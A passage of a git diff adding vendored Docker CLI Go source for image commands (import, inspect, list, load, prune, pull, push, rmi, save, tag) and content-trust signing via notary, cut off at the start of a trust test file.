cmd.Flags() + + opts.changes = dockeropts.NewListOpts(nil) + flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") + flags.StringVarP(&opts.message, "message", "m", "", "Set commit message for imported image") + + return cmd +} + +func runImport(dockerCli *command.DockerCli, opts importOptions) error { + var ( + in io.Reader + srcName = opts.source + ) + + if 
opts.source == "-" { + in = dockerCli.In() + } else if !urlutil.IsURL(opts.source) { + srcName = "-" + file, err := os.Open(opts.source) + if err != nil { + return err + } + defer file.Close() + in = file + } + + source := types.ImageImportSource{ + Source: in, + SourceName: srcName, + } + + options := types.ImageImportOptions{ + Message: opts.message, + Changes: opts.changes.GetAll(), + } + + clnt := dockerCli.Client() + + responseBody, err := clnt.ImageImport(context.Background(), source, opts.reference, options) + if err != nil { + return err + } + defer responseBody.Close() + + return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/inspect.go b/vendor/github.com/docker/docker/cli/command/image/inspect.go new file mode 100644 index 0000000000..217863c772 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/inspect.go @@ -0,0 +1,44 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + refs []string +} + +// newInspectCommand creates a new cobra.Command for `docker image inspect` +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] IMAGE [IMAGE...]", + Short: "Display detailed information on one or more images", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.refs = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + getRefFunc 
:= func(ref string) (interface{}, []byte, error) { + return client.ImageInspectWithRaw(ctx, ref) + } + return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/list.go b/vendor/github.com/docker/docker/cli/command/image/list.go new file mode 100644 index 0000000000..679604fc02 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/list.go @@ -0,0 +1,96 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type imagesOptions struct { + matchName string + + quiet bool + all bool + noTrunc bool + showDigests bool + format string + filter opts.FilterOpt +} + +// NewImagesCommand creates a new `docker images` command +func NewImagesCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := imagesOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "images [OPTIONS] [REPOSITORY[:TAG]]", + Short: "List images", + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + if len(args) > 0 { + opts.matchName = args[0] + } + return runImages(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") + flags.BoolVarP(&opts.all, "all", "a", false, "Show all images (default hides intermediate images)") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + flags.BoolVar(&opts.showDigests, "digests", false, "Show digests") + flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := 
*NewImagesCommand(dockerCli) + cmd.Aliases = []string{"images", "list"} + cmd.Use = "ls [OPTIONS] [REPOSITORY[:TAG]]" + return &cmd +} + +func runImages(dockerCli *command.DockerCli, opts imagesOptions) error { + ctx := context.Background() + + filters := opts.filter.Value() + if opts.matchName != "" { + filters.Add("reference", opts.matchName) + } + + options := types.ImageListOptions{ + All: opts.all, + Filters: filters, + } + + images, err := dockerCli.Client().ImageList(ctx, options) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().ImagesFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().ImagesFormat + } else { + format = formatter.TableFormatKey + } + } + + imageCtx := formatter.ImageContext{ + Context: formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewImageFormat(format, opts.quiet, opts.showDigests), + Trunc: !opts.noTrunc, + }, + Digest: opts.showDigests, + } + return formatter.ImageWrite(imageCtx, images) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/load.go b/vendor/github.com/docker/docker/cli/command/image/load.go new file mode 100644 index 0000000000..988f5106e2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/load.go @@ -0,0 +1,77 @@ +package image + +import ( + "fmt" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/system" + "github.com/spf13/cobra" +) + +type loadOptions struct { + input string + quiet bool +} + +// NewLoadCommand creates a new `docker load` command +func NewLoadCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts loadOptions + + cmd := &cobra.Command{ + Use: "load [OPTIONS]", + Short: "Load an image from a tar archive or STDIN", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runLoad(dockerCli, opts) + }, 
+ } + + flags := cmd.Flags() + + flags.StringVarP(&opts.input, "input", "i", "", "Read from tar archive file, instead of STDIN") + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Suppress the load output") + + return cmd +} + +func runLoad(dockerCli *command.DockerCli, opts loadOptions) error { + + var input io.Reader = dockerCli.In() + if opts.input != "" { + // We use system.OpenSequential to use sequential file access on Windows, avoiding + // depleting the standby list un-necessarily. On Linux, this equates to a regular os.Open. + file, err := system.OpenSequential(opts.input) + if err != nil { + return err + } + defer file.Close() + input = file + } + + // To avoid getting stuck, verify that a tar file is given either in + // the input flag or through stdin and if not display an error message and exit. + if opts.input == "" && dockerCli.In().IsTerminal() { + return fmt.Errorf("requested load from stdin, but stdin is empty") + } + + if !dockerCli.Out().IsTerminal() { + opts.quiet = true + } + response, err := dockerCli.Client().ImageLoad(context.Background(), input, opts.quiet) + if err != nil { + return err + } + defer response.Body.Close() + + if response.Body != nil && response.JSON { + return jsonmessage.DisplayJSONMessagesToStream(response.Body, dockerCli.Out(), nil) + } + + _, err = io.Copy(dockerCli.Out(), response.Body) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/image/prune.go b/vendor/github.com/docker/docker/cli/command/image/prune.go new file mode 100644 index 0000000000..82c28fcf49 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/prune.go @@ -0,0 +1,92 @@ +package image + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool + all bool +} + +// NewPruneCommand returns a new 
cobra prune command for images +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove unused images", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + spaceReclaimed, output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images, not just dangling ones") + + return cmd +} + +const ( + allImageWarning = `WARNING! This will remove all images without at least one container associated to them. +Are you sure you want to continue?` + danglingWarning = `WARNING! This will remove all dangling images. 
+Are you sure you want to continue?` +) + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { + pruneFilters := filters.NewArgs() + pruneFilters.Add("dangling", fmt.Sprintf("%v", !opts.all)) + + warning := danglingWarning + if opts.all { + warning = allImageWarning + } + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().ImagesPrune(context.Background(), pruneFilters) + if err != nil { + return + } + + if len(report.ImagesDeleted) > 0 { + output = "Deleted Images:\n" + for _, st := range report.ImagesDeleted { + if st.Untagged != "" { + output += fmt.Sprintln("untagged:", st.Untagged) + } else { + output += fmt.Sprintln("deleted:", st.Deleted) + } + } + spaceReclaimed = report.SpaceReclaimed + } + + return +} + +// RunPrune calls the Image Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { + return runPrune(dockerCli, pruneOptions{force: true, all: all}) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/pull.go b/vendor/github.com/docker/docker/cli/command/image/pull.go new file mode 100644 index 0000000000..24933fe846 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/pull.go @@ -0,0 +1,84 @@ +package image + +import ( + "errors" + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +type pullOptions struct { + remote string + all bool +} + +// NewPullCommand creates a new `docker pull` command +func NewPullCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pullOptions + + cmd := &cobra.Command{ + Use: "pull [OPTIONS] NAME[:TAG|@DIGEST]", + Short: "Pull an image or a 
repository from a registry", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.remote = args[0] + return runPull(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.all, "all-tags", "a", false, "Download all tagged images in the repository") + command.AddTrustedFlags(flags, true) + + return cmd +} + +func runPull(dockerCli *command.DockerCli, opts pullOptions) error { + distributionRef, err := reference.ParseNamed(opts.remote) + if err != nil { + return err + } + if opts.all && !reference.IsNameOnly(distributionRef) { + return errors.New("tag can't be used with --all-tags/-a") + } + + if !opts.all && reference.IsNameOnly(distributionRef) { + distributionRef = reference.WithDefaultTag(distributionRef) + fmt.Fprintf(dockerCli.Out(), "Using default tag: %s\n", reference.DefaultTag) + } + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := registry.ParseRepositoryInfo(distributionRef) + if err != nil { + return err + } + + ctx := context.Background() + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "pull") + + // Check if reference has a digest + _, isCanonical := distributionRef.(reference.Canonical) + if command.IsTrusted() && !isCanonical { + err = trustedPull(ctx, dockerCli, repoInfo, distributionRef, authConfig, requestPrivilege) + } else { + err = imagePullPrivileged(ctx, dockerCli, authConfig, distributionRef.String(), requestPrivilege, opts.all) + } + if err != nil { + if strings.Contains(err.Error(), "target is plugin") { + return errors.New(err.Error() + " - Use `docker plugin install`") + } + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/push.go b/vendor/github.com/docker/docker/cli/command/image/push.go new file mode 100644 index 0000000000..a8ce4945ec --- /dev/null +++ 
b/vendor/github.com/docker/docker/cli/command/image/push.go @@ -0,0 +1,61 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +// NewPushCommand creates a new `docker push` command +func NewPushCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "push [OPTIONS] NAME[:TAG]", + Short: "Push an image or a repository to a registry", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runPush(dockerCli, args[0]) + }, + } + + flags := cmd.Flags() + + command.AddTrustedFlags(flags, true) + + return cmd +} + +func runPush(dockerCli *command.DockerCli, remote string) error { + ref, err := reference.ParseNamed(remote) + if err != nil { + return err + } + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := registry.ParseRepositoryInfo(ref) + if err != nil { + return err + } + + ctx := context.Background() + + // Resolve the Auth config relevant for this server + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "push") + + if command.IsTrusted() { + return trustedPush(ctx, dockerCli, repoInfo, ref, authConfig, requestPrivilege) + } + + responseBody, err := imagePushPrivileged(ctx, dockerCli, authConfig, ref.String(), requestPrivilege) + if err != nil { + return err + } + + defer responseBody.Close() + return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/remove.go b/vendor/github.com/docker/docker/cli/command/image/remove.go new file mode 100644 index 0000000000..c79ceba7a8 --- /dev/null +++ 
b/vendor/github.com/docker/docker/cli/command/image/remove.go @@ -0,0 +1,77 @@ +package image + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + force bool + noPrune bool +} + +// NewRemoveCommand creates a new `docker remove` command +func NewRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rmi [OPTIONS] IMAGE [IMAGE...]", + Short: "Remove one or more images", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, opts, args) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.force, "force", "f", false, "Force removal of the image") + flags.BoolVar(&opts.noPrune, "no-prune", false, "Do not delete untagged parents") + + return cmd +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := *NewRemoveCommand(dockerCli) + cmd.Aliases = []string{"rmi", "remove"} + cmd.Use = "rm [OPTIONS] IMAGE [IMAGE...]" + return &cmd +} + +func runRemove(dockerCli *command.DockerCli, opts removeOptions, images []string) error { + client := dockerCli.Client() + ctx := context.Background() + + options := types.ImageRemoveOptions{ + Force: opts.force, + PruneChildren: !opts.noPrune, + } + + var errs []string + for _, image := range images { + dels, err := client.ImageRemove(ctx, image, options) + if err != nil { + errs = append(errs, err.Error()) + } else { + for _, del := range dels { + if del.Deleted != "" { + fmt.Fprintf(dockerCli.Out(), "Deleted: %s\n", del.Deleted) + } else { + fmt.Fprintf(dockerCli.Out(), "Untagged: %s\n", del.Untagged) + } + } + } + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/save.go 
b/vendor/github.com/docker/docker/cli/command/image/save.go new file mode 100644 index 0000000000..bbe82d2a05 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/save.go @@ -0,0 +1,57 @@ +package image + +import ( + "errors" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type saveOptions struct { + images []string + output string +} + +// NewSaveCommand creates a new `docker save` command +func NewSaveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts saveOptions + + cmd := &cobra.Command{ + Use: "save [OPTIONS] IMAGE [IMAGE...]", + Short: "Save one or more images to a tar archive (streamed to STDOUT by default)", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.images = args + return runSave(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") + + return cmd +} + +func runSave(dockerCli *command.DockerCli, opts saveOptions) error { + if opts.output == "" && dockerCli.Out().IsTerminal() { + return errors.New("Cowardly refusing to save to a terminal. 
Use the -o flag or redirect.") + } + + responseBody, err := dockerCli.Client().ImageSave(context.Background(), opts.images) + if err != nil { + return err + } + defer responseBody.Close() + + if opts.output == "" { + _, err := io.Copy(dockerCli.Out(), responseBody) + return err + } + + return command.CopyToFile(opts.output, responseBody) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/tag.go b/vendor/github.com/docker/docker/cli/command/image/tag.go new file mode 100644 index 0000000000..fb2b703856 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/tag.go @@ -0,0 +1,41 @@ +package image + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type tagOptions struct { + image string + name string +} + +// NewTagCommand creates a new `docker tag` command +func NewTagCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts tagOptions + + cmd := &cobra.Command{ + Use: "tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]", + Short: "Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.image = args[0] + opts.name = args[1] + return runTag(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + return cmd +} + +func runTag(dockerCli *command.DockerCli, opts tagOptions) error { + ctx := context.Background() + + return dockerCli.Client().ImageTag(ctx, opts.image, opts.name) +} diff --git a/vendor/github.com/docker/docker/cli/command/image/trust.go b/vendor/github.com/docker/docker/cli/command/image/trust.go new file mode 100644 index 0000000000..5136a22156 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/trust.go @@ -0,0 +1,381 @@ +package image + +import ( + "encoding/hex" + "encoding/json" + "errors" + "fmt" + "io" + "path" + "sort" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + 
"github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/trust" + "github.com/docker/docker/distribution" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/notary/client" + "github.com/docker/notary/tuf/data" +) + +type target struct { + name string + digest digest.Digest + size int64 +} + +// trustedPush handles content trust pushing of an image +func trustedPush(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { + responseBody, err := imagePushPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege) + if err != nil { + return err + } + + defer responseBody.Close() + + return PushTrustedReference(cli, repoInfo, ref, authConfig, responseBody) +} + +// PushTrustedReference pushes a canonical reference to the trust server. +func PushTrustedReference(cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, in io.Reader) error { + // If it is a trusted push we would like to find the target entry which match the + // tag provided in the function and then do an AddTarget later. + target := &client.Target{} + // Count the times of calling for handleTarget, + // if it is called more that once, that should be considered an error in a trusted push. + cnt := 0 + handleTarget := func(aux *json.RawMessage) { + cnt++ + if cnt > 1 { + // handleTarget should only be called one. This will be treated as an error. 
+ return + } + + var pushResult distribution.PushResult + err := json.Unmarshal(*aux, &pushResult) + if err == nil && pushResult.Tag != "" && pushResult.Digest.Validate() == nil { + h, err := hex.DecodeString(pushResult.Digest.Hex()) + if err != nil { + target = nil + return + } + target.Name = pushResult.Tag + target.Hashes = data.Hashes{string(pushResult.Digest.Algorithm()): h} + target.Length = int64(pushResult.Size) + } + } + + var tag string + switch x := ref.(type) { + case reference.Canonical: + return errors.New("cannot push a digest reference") + case reference.NamedTagged: + tag = x.Tag() + default: + // We want trust signatures to always take an explicit tag, + // otherwise it will act as an untrusted push. + if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), nil); err != nil { + return err + } + fmt.Fprintln(cli.Out(), "No tag specified, skipping trust metadata push") + return nil + } + + if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), handleTarget); err != nil { + return err + } + + if cnt > 1 { + return fmt.Errorf("internal error: only one call to handleTarget expected") + } + + if target == nil { + fmt.Fprintln(cli.Out(), "No targets found, please provide a specific tag in order to sign it") + return nil + } + + fmt.Fprintln(cli.Out(), "Signing and pushing trust metadata") + + repo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "push", "pull") + if err != nil { + fmt.Fprintf(cli.Out(), "Error establishing connection to notary repository: %s\n", err) + return err + } + + // get the latest repository metadata so we can figure out which roles to sign + err = repo.Update(false) + + switch err.(type) { + case client.ErrRepoNotInitialized, client.ErrRepositoryNotExist: + keys := repo.CryptoService.ListKeys(data.CanonicalRootRole) + var rootKeyID string + // always select the first root key + if len(keys) > 0 { + sort.Strings(keys) + rootKeyID = keys[0] + } else { + rootPublicKey, err := 
repo.CryptoService.Create(data.CanonicalRootRole, "", data.ECDSAKey) + if err != nil { + return err + } + rootKeyID = rootPublicKey.ID() + } + + // Initialize the notary repository with a remotely managed snapshot key + if err := repo.Initialize([]string{rootKeyID}, data.CanonicalSnapshotRole); err != nil { + return trust.NotaryError(repoInfo.FullName(), err) + } + fmt.Fprintf(cli.Out(), "Finished initializing %q\n", repoInfo.FullName()) + err = repo.AddTarget(target, data.CanonicalTargetsRole) + case nil: + // already initialized and we have successfully downloaded the latest metadata + err = addTargetToAllSignableRoles(repo, target) + default: + return trust.NotaryError(repoInfo.FullName(), err) + } + + if err == nil { + err = repo.Publish() + } + + if err != nil { + fmt.Fprintf(cli.Out(), "Failed to sign %q:%s - %s\n", repoInfo.FullName(), tag, err.Error()) + return trust.NotaryError(repoInfo.FullName(), err) + } + + fmt.Fprintf(cli.Out(), "Successfully signed %q:%s\n", repoInfo.FullName(), tag) + return nil +} + +// Attempt to add the image target to all the top level delegation roles we can +// (based on whether we have the signing key and whether the role's path allows +// us to). +// If there are no delegation roles, we add to the targets role. 
+func addTargetToAllSignableRoles(repo *client.NotaryRepository, target *client.Target) error { + var signableRoles []string + + // translate the full key names, which includes the GUN, into just the key IDs + allCanonicalKeyIDs := make(map[string]struct{}) + for fullKeyID := range repo.CryptoService.ListAllKeys() { + allCanonicalKeyIDs[path.Base(fullKeyID)] = struct{}{} + } + + allDelegationRoles, err := repo.GetDelegationRoles() + if err != nil { + return err + } + + // if there are no delegation roles, then just try to sign it into the targets role + if len(allDelegationRoles) == 0 { + return repo.AddTarget(target, data.CanonicalTargetsRole) + } + + // there are delegation roles, find every delegation role we have a key for, and + // attempt to sign into into all those roles. + for _, delegationRole := range allDelegationRoles { + // We do not support signing any delegation role that isn't a direct child of the targets role. + // Also don't bother checking the keys if we can't add the target + // to this role due to path restrictions + if path.Dir(delegationRole.Name) != data.CanonicalTargetsRole || !delegationRole.CheckPaths(target.Name) { + continue + } + + for _, canonicalKeyID := range delegationRole.KeyIDs { + if _, ok := allCanonicalKeyIDs[canonicalKeyID]; ok { + signableRoles = append(signableRoles, delegationRole.Name) + break + } + } + } + + if len(signableRoles) == 0 { + return fmt.Errorf("no valid signing keys for delegation roles") + } + + return repo.AddTarget(target, signableRoles...) 
+} + +// imagePushPrivileged push the image +func imagePushPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc) (io.ReadCloser, error) { + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return nil, err + } + options := types.ImagePushOptions{ + RegistryAuth: encodedAuth, + PrivilegeFunc: requestPrivilege, + } + + return cli.Client().ImagePush(ctx, ref, options) +} + +// trustedPull handles content trust pulling of an image +func trustedPull(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { + var refs []target + + notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") + if err != nil { + fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) + return err + } + + if tagged, isTagged := ref.(reference.NamedTagged); !isTagged { + // List all targets + targets, err := notaryRepo.ListTargets(trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return trust.NotaryError(repoInfo.FullName(), err) + } + for _, tgt := range targets { + t, err := convertTarget(tgt.Target) + if err != nil { + fmt.Fprintf(cli.Out(), "Skipping target for %q\n", repoInfo.Name()) + continue + } + // Only list tags in the top level targets role or the releases delegation role - ignore + // all other delegation roles + if tgt.Role != trust.ReleasesRole && tgt.Role != data.CanonicalTargetsRole { + continue + } + refs = append(refs, t) + } + if len(refs) == 0 { + return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trusted tags for %s", repoInfo.FullName())) + } + } else { + t, err := notaryRepo.GetTargetByName(tagged.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return trust.NotaryError(repoInfo.FullName(), err) + } + // Only get the tag if it's 
in the top level targets role or the releases delegation role + // ignore it if it's in any other delegation roles + if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { + return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", tagged.Tag())) + } + + logrus.Debugf("retrieving target for %s role\n", t.Role) + r, err := convertTarget(t.Target) + if err != nil { + return err + + } + refs = append(refs, r) + } + + for i, r := range refs { + displayTag := r.name + if displayTag != "" { + displayTag = ":" + displayTag + } + fmt.Fprintf(cli.Out(), "Pull (%d of %d): %s%s@%s\n", i+1, len(refs), repoInfo.Name(), displayTag, r.digest) + + ref, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) + if err != nil { + return err + } + if err := imagePullPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege, false); err != nil { + return err + } + + tagged, err := reference.WithTag(repoInfo, r.name) + if err != nil { + return err + } + trustedRef, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) + if err != nil { + return err + } + if err := TagTrusted(ctx, cli, trustedRef, tagged); err != nil { + return err + } + } + return nil +} + +// imagePullPrivileged pulls the image and displays it to the output +func imagePullPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc, all bool) error { + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + options := types.ImagePullOptions{ + RegistryAuth: encodedAuth, + PrivilegeFunc: requestPrivilege, + All: all, + } + + responseBody, err := cli.Client().ImagePull(ctx, ref, options) + if err != nil { + return err + } + defer responseBody.Close() + + return jsonmessage.DisplayJSONMessagesToStream(responseBody, cli.Out(), nil) +} + +// TrustedReference returns the canonical trusted reference for an image reference +func 
TrustedReference(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged, rs registry.Service) (reference.Canonical, error) { + var ( + repoInfo *registry.RepositoryInfo + err error + ) + if rs != nil { + repoInfo, err = rs.ResolveRepository(ref) + } else { + repoInfo, err = registry.ParseRepositoryInfo(ref) + } + if err != nil { + return nil, err + } + + // Resolve the Auth config relevant for this server + authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) + + notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") + if err != nil { + fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) + return nil, err + } + + t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return nil, trust.NotaryError(repoInfo.FullName(), err) + } + // Only list tags in the top level targets role or the releases delegation role - ignore + // all other delegation roles + if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { + return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.Tag())) + } + r, err := convertTarget(t.Target) + if err != nil { + return nil, err + + } + + return reference.WithDigest(reference.TrimNamed(ref), r.digest) +} + +func convertTarget(t client.Target) (target, error) { + h, ok := t.Hashes["sha256"] + if !ok { + return target{}, errors.New("no valid hash, expecting sha256") + } + return target{ + name: t.Name, + digest: digest.NewDigestFromHex("sha256", hex.EncodeToString(h)), + size: t.Length, + }, nil +} + +// TagTrusted tags a trusted ref +func TagTrusted(ctx context.Context, cli *command.DockerCli, trustedRef reference.Canonical, ref reference.NamedTagged) error { + fmt.Fprintf(cli.Out(), "Tagging %s as %s\n", trustedRef.String(), ref.String()) + + return cli.Client().ImageTag(ctx, trustedRef.String(), ref.String()) +} diff --git 
a/vendor/github.com/docker/docker/cli/command/image/trust_test.go b/vendor/github.com/docker/docker/cli/command/image/trust_test.go new file mode 100644 index 0000000000..78146465e6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/trust_test.go @@ -0,0 +1,57 @@ +package image + +import ( + "os" + "testing" + + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli/trust" + "github.com/docker/docker/registry" +) + +func unsetENV() { + os.Unsetenv("DOCKER_CONTENT_TRUST") + os.Unsetenv("DOCKER_CONTENT_TRUST_SERVER") +} + +func TestENVTrustServer(t *testing.T) { + defer unsetENV() + indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} + if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "https://notary-test.com:5000"); err != nil { + t.Fatal("Failed to set ENV variable") + } + output, err := trust.Server(indexInfo) + expectedStr := "https://notary-test.com:5000" + if err != nil || output != expectedStr { + t.Fatalf("Expected server to be %s, got %s", expectedStr, output) + } +} + +func TestHTTPENVTrustServer(t 